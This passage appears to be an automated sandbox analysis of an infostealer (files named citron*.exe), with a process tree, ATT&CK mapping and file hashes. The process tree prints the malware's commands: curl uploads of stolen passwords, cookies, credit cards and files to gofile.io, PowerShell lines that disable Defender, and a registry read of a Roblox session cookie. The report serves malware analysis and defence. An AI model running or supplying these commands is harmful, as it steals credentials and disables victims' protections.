      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile
      4⤵
      PID:5368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile"
    3⤵
    PID:5408
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile
      4⤵
      PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile"
    3⤵
    PID:1676
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile
      4⤵
      PID:2800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:4636
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:5428

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\README.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:5616

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe"
1⤵
- Executes dropped EXE
PID:5860
- C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe
  "C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:1948
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:5184
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:5384
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:4816
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:5684
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile"
    3⤵
    PID:960
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile
      4⤵
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/SkipBackup.xlsx" https://store9.gofile.io/uploadFile"
    3⤵
    PID:2336
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/SkipBackup.xlsx" https://store9.gofile.io/uploadFile
      4⤵
      PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/SuspendBackup.mp4v" https://store4.gofile.io/uploadFile"
    3⤵
    PID:6044
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin/Desktop/SuspendBackup.mp4v" https://store4.gofile.io/uploadFile
      4⤵
      PID:5368

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5152
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4924
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:2176
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:3996
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1508
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4952

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe"
1⤵
- Executes dropped EXE
PID:1880
- C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe
  "C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:5396

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\CitronYUH.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\CitronYUH.exe"
1⤵
- Executes dropped EXE
PID:3984
- C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\CitronYUH.exe
  "C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\CitronYUH.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:4332

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe"
1⤵
- Executes dropped EXE
PID:2196
- C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe
  "C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citronuh.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:1952

C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe
"C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:6040
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\citronToppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7-zip.dll

Filesize
99KB

MD5
d346530e648e15887ae88ea34c82efc9

SHA1
5644d95910852e50a4b42375bddfef05f6b3490f

SHA256
f972b164d9a90821be0ea2f46da84dd65f85cd0f29cd1abba0c8e9a7d0140902

SHA512
62db21717f79702cbdd805109f30f51a7f7ff5f751dc115f4c95d052c5405eb34d5e8c5a83f426d73875591b7d463f00f686c182ef3850db2e25989ae2d83673

Download Submit
C:\Program Files\7-Zip\7z.dll

Filesize
1.8MB

MD5
1143c4905bba16d8cc02c6ba8f37f365

SHA1
db38ac221275acd087cf87ebad393ef7f6e04656

SHA256
e79ddfb6319dbf9bac6382035d23597dad979db5e71a605d81a61ee817c1e812

SHA512
b918ae107c179d0b96c8fb14c2d5f019cad381ba4dcdc760c918dfcd5429d1c9fb6ce23f4648823a0449cb8a842af47f25ede425a4e37a7b67eb291ce8cce894

Download Submit
C:\Program Files\7-Zip\7zG.exe

Filesize
692KB

MD5
4159ff3f09b72e504e25a5f3c7ed3a5b

SHA1
b79ab2c83803e1d6da1dcd902f41e45d6cd26346

SHA256
0163ec83208b4902a2846de998a915de1b9e72aba33d98d5c8a14a8fbf0f6101

SHA512
48f54f0ab96be620db392b4c459a49a0fa8fbe95b1c1b7df932de565cf5f77adfaae98ef1e5998f326172b5ae4ffa9896aeac0f7b98568fcde6f7b1480df4e2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\6e017fa4-e23e-4573-b48d-bd3e7c58eeb0.tmp

Filesize
11KB

MD5
4d07f3293fc7020b22f45bca7b936011

SHA1
dd71b54d99fbc7f6475d9d75f2af0764c2b64633

SHA256
fa67603a290e8647e3a11cffa5d0181cb1b6bc2d26a3c383a464c06347bfc616

SHA512
337159e79be829cee8806aac8f35f651211de0d291535915b212c7981935ae8db831b14a3988e0038b69a9e101538185a2fcdede311e8021f544a63768fbb69a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a8276eab0f8f0c0bb325b5b8c329f64f

SHA1
8ce681e4056936ca8ccd6f487e7cd7cccbae538b

SHA256
847f60e288d327496b72dbe1e7aa1470a99bf27c0a07548b6a386a6188cd72da

SHA512
42f91bf90e92220d0731fa4279cc5773d5e9057a9587f311bee0b3f7f266ddceca367bd0ee7f1438c3606598553a2372316258c05e506315e4e11760c8f13918

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
058032c530b52781582253cb245aa731

SHA1
7ca26280e1bfefe40e53e64345a0d795b5303fab

SHA256
1c3a7192c514ef0d2a8cf9115cfb44137ca98ec6daa4f68595e2be695c7ed67e

SHA512
77fa3cdcd53255e7213bb99980049e11d6a2160f8130c84bd16b35ba9e821a4e51716371526ec799a5b4927234af99e0958283d78c0799777ab4dfda031f874f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
20KB

MD5
88924e883819450fea6752faf211c02e

SHA1
f65cd48ba61e6854b8695490e82b8ef1256c0ad7

SHA256
2775bac57d4aa61e0bafe9902dda744b81a6bc392a953a125fad1da7c949fbec

SHA512
c3aaeb5f7016f819015b54ac7f2cde14cb71b613b046b7097a61d7836f3cf67d38bc6eaad619561c72828d6f930de0362cacddade2f4590389e6c363755c68e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
83184392dbc5fd717562ea11b7986c9b

SHA1
3f8191d6d851220ab3289ac90c8e06e0dfa4075a

SHA256
d53c39da4f4fb12e53d32c647c2bded0755cc8c0910de25a87d87663251d9a44

SHA512
5b999966ed740a5256d1c7451a767ed91f0bdd877723f2e0ad404e3c37704f0d98856b760ad2a0e5118fad4ef18161c012bb7ae5339c61756ba810e653401968

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
1341386ea1be160a53a72a2dd92d6c32

SHA1
cb5c1335163ae1202d6f18dec4b258561965cddc

SHA256
d6544eafaefe050c030687d254885f41f109dfea96f63258d5358755ec2ae9a6

SHA512
8a8e369fc8ea9d03d4d654d1994e9c4f82de6168161c47a394c6f2f462e3a890525428a37feda7466e4222930e7cadf086fcca2270709557750657870322ed43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
28KB

MD5
df6e79f7fa6f87fb6f63600514e8a352

SHA1
51453a6c166b4202f81ab0535d62149d8ed7a9d0

SHA256
ce89e936105a4455f163ab970557e358aeda884db482567f245a825963699f62

SHA512
561bc6de8ba8f1289acaa35bc45d46f52aea55e233651dd0e4e9e55d885920e0c5fef5665e66780b8f1af021e764436e611c44956ecba0cf0418ffee42ebd3c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
14KB

MD5
488b92fb037fcf1f84674ff49a2f9256

SHA1
7f1246d8ff77875bb237c9757bcefb707093f195

SHA256
b80b3398bb91e4120488f666e8b0e41102167e126f1a23ada5af2558bde01791

SHA512
fb0a4712417cc90dc68d9ecd8ced523650b06029d63079e9ae84ad3d0ffcc6401b6188fb873fb53440cbd0f8b786922c74f0c2d0d968d80a6d7b24cf144f1742

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
e4976da6a6699856b588325a8d2bad75

SHA1
8bb07c7ff49bbc0bc691368a1a45b93a2b7d0e13

SHA256
c6ba43522c43bd813223fb9db8c901a8a3b78edddbee34f4ea461a6141879ad3

SHA512
dcb8ab8e8b9e2e0f2432fab888ebac334023b463c2cbbb9e1e3eea63110d9509a8ee2ad08c4e95f5e59e0872594b2248cf48af92fd31a49d385cd5988b73d2f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
7834a1a56c5e9669101bafb76f07768e

SHA1
f7453c188ac8fe6295a7218cdbc5db4196f7f12a

SHA256
6dc307ee545cff8288fa0a55e465243a1c0b80dfa8f4253355556a8f9520aeea

SHA512
cafd9eec4e8c6e5dcbc46a2909d795aa0d6c33649550cd544945a4e9ef4cefe62f8e4a7ab0af7e7edd1c1c0996a18876be199e587534b979e8ae1cb01c8581b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
2e511beb7ab5e37137e627fe11c6327a

SHA1
9fa5873fb53dac0e758a5bbf452b87dd24a9c424

SHA256
f852eadcc78b8d4ed286345bec166922704018f7b5ab7466089f45e7405275ba

SHA512
734f822e27635b059629324d81bfcacbe08827a76a63f62e22e44bc5477a65504713da0e8cf42b5ab97c8e6604e6bef788c22ace72eea2bbcb7f021cc37bc642

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
618ff67b79a138d670b3df8267fd197e

SHA1
d5450b436a061d75267a7f1356042044d2c4e7c8

SHA256
e28ab23b08dc13c21b8e71151126c9aa180031a8af1ff6003aeb18ca6855c867

SHA512
5078b8a4914ffd911f0cd468dd831f856b530c479503300239fe90cf3ba4a7cd54357ff1518c78e60a4d3d8aedbf5c700969a9570ade253946ad8bebe85343b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
53b5428d5f2d60a1364b152adfac28cf

SHA1
02c72fe174f2e2b47f53e38183fc98b6862c43a4

SHA256
0cbd3b2d133d60ddf68c96444cc68b1a6d1f92066729b57fc9d808f57ee6d6db

SHA512
2c042b8e79530bf72576090e4217a320a7ba4c220160e156ca2a259d8841def76b43800d964877dd3f59748784aab67e21301d4b9a1e32d4d5b43c3a986966e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ba9d0fe58703dbc5b22fa87511efeff5

SHA1
93d50e0a4a55e2d87db85c0f7f16aeada6a5b690

SHA256
cc2277ba4476dcc44123a02bcc07aa8fa060938edc5cdb05824cd86ebfc0921e

SHA512
cc6895346bed352c56919f88e2a6199a26563d28d833d3532a83379c484a64f0423a939ff231694c111697343ac14c923ae548385aa35f7487687610c5d9f754

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
4044aea099d161d9cf24f0864aaf7261

SHA1
ca0825a56974215d646c59a1b6bfdc0df760d0b8

SHA256
718137d06527f89a7c7033b2053e4374adac4b0445e057a9a05b5ee7e61dd61e

SHA512
e2460e5c232121c47363fe26dae361e5e30ca00991f598ac1e700620a1a9b201aafbe39b83d43021b07493f7cd204fdb57db18d63dc875577615102e63d8ef5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
54328b5d0002f81a0217bbe6f7fc9db4

SHA1
adc86c6f6ef24f8376568927bd00928066078507

SHA256
4c2c3e7c09d821f96b8bffcdff205b9970ab3125f2a0d70ce491c43145ec3293

SHA512
78d7bcd98373fc2b42bef88d96619414880b39151e7862086a61afd3144b16c5dfb26a0100695651e0fb190e4c352b6b529abfd6a13dfcc7a4f67e308660f4dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
d353d24a3698538172b513fdef65eef1

SHA1
a4c95580011b1263d8962b35b69df7e2901cf44c

SHA256
7aa730e9452a836056599cc1568adcd46654e968768e0801195d5147949097d8

SHA512
a4e812fd49f713bf5aa652b859f7f6413c170e942b85056e3d67883d88cadd7d59f678bcf4bf09467546439dc6e64c203eaacbea36dbab6e4019c035d843e1bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585e48.TMP

Filesize
204B

MD5
00827af876aa04c223dd4095325f6deb

SHA1
34bc15823b1678864c063a5d308a824a25590f65

SHA256
451eb0a5f1a8d3ccfe4769714dc3d955b9941f640f557b0cbc68ed87ff4b3a62

SHA512
5895eaaf16be116f17ddb885b01d16cd80760a410161fba83d600e382132454d374bc3e3a0a02ffdd1c36246d26b85c350f7b685639d86da1b1389e1ebf4b46b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
72c84b223af4aaf65c61912e1daf3cc3

SHA1
a77910ff872a23caa317080979348c8cbff39805

SHA256
db47a48bae04ee327ff8aab12717bc9a938d0bd54bca9e8ca64e90634ce3661d

SHA512
dde51dda153be50f5e4a6a72e673e6eb6a92fb73e80d0deadb9b434f99350c69e93b53a99cc43235eec2737bb21eab4b88f6a01a5639b26a8bde6643c42d137e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
11d3d9a8b04a794229254a7521388725

SHA1
1fb9a712a1ae8891b1c70a4ac1a1e2c8b03139da

SHA256
129794c3d3623bad46fe49662ca7a66e56ad57b41dcb6e0dfc6cd4593c0f4346

SHA512
09ce2e410f47cf2b785e5637b6a02b2d5759bd6c0e7a67c139ed90463e9765df0d1a38c817d8a792f75cd2243ad19836620c2926f2be05da7538a27996667d23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
2558af65fa0e0fdff802046cb4d87e66

SHA1
a90d8668d426b2f552f27543bfc2b444c1511d0f

SHA256
76832b70fd9ab098e34e086fb3b0ae3b88fd1c39814918057afd8cde1dc84fd0

SHA512
a6c5a20e0fab4eb6cb4ea31ab24282cc056e3ace878af4fee5c20d17244657b2285a7e7ca93b2ae7c25e498294b9cdee519fe9709373cfb62be527015830b356

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f29ff8b1e0f396a194a6782749830b8e

SHA1
2f8999b0eb2a20e591cf9a638c9fa84ddf4a1f69

SHA256
5bfd4968395fefaac3941c08fa11e86dfde1072137d9290aee3888f2a5d92d3f

SHA512
0689d665f2a7c9007c5dc4c14a53d5566d315d05d476bee82d64d02d40e3ffddca2b36419c76a8f7b7979958a62a7a93c939d1ed72fa7a844841ed06741b9e19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a2e520b7c549596eb8a1e0778b15db17

SHA1
db093488a4eaf40138f2c3d550db14e6a0bdd055

SHA256
00bc2521e1a98687dcc4be3dc5a9f5faf553f46a605d5226fa5ea98c7d4cfc86

SHA512
399470227a097913d125cfafd75dcb6a1872e3a1c10d952beb878ab8ae34ff63188316a975491583510427447c72e764aa18d17408479126b125153fa43463ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
894afb4ff3cd7ee1f69400e936f8fc9d

SHA1
aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

SHA256
20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

SHA512
449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\9SKeEyv7gXyMUTU\Browsers\Cookies\Edge Cookies.txt

Filesize
4KB

MD5
636b005b6bb01218a4b996195da60dde

SHA1
f849dc6df934f09c3ce1e540c32ae3701f210522

SHA256
9515df5cacb7d3b7e745a2625a1955eaf3cf654a16aeac3364f894797519f272

SHA512
aa1d86534748a856a1a326cb684727c12d4b07f2163814373a80c5cfeb031fd0baecae4063c19a7a589daced89177a82e60cb23f6f32a7a0fcdbf76862ff6aff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37242\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39842\Crypto\Cipher\_ARC4.pyd

Filesize
11KB

MD5
6176101b7c377a32c01ae3edb7fd4de6

SHA1
5f1cb443f9d677f313bec07c5241aeab57502f5e

SHA256
efea361311923189ecbe3240111efba329752d30457e0dbe9628a82905cd4bdb

SHA512
3e7373b71ae0834e96a99595cfef2e96c0f5230429adc0b5512f4089d1ed0d7f7f0e32a40584dfb13c41d257712a9c4e9722366f0a21b907798ae79d8cedcf30

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39842\Crypto\Cipher\_Salsa20.pyd

Filesize
13KB

MD5
371776a7e26baeb3f75c93a8364c9ae0

SHA1
bf60b2177171ba1c6b4351e6178529d4b082bda9

SHA256
15257e96d1ca8480b8cb98f4c79b6e365fe38a1ba9638fc8c9ab7ffea79c4762

SHA512
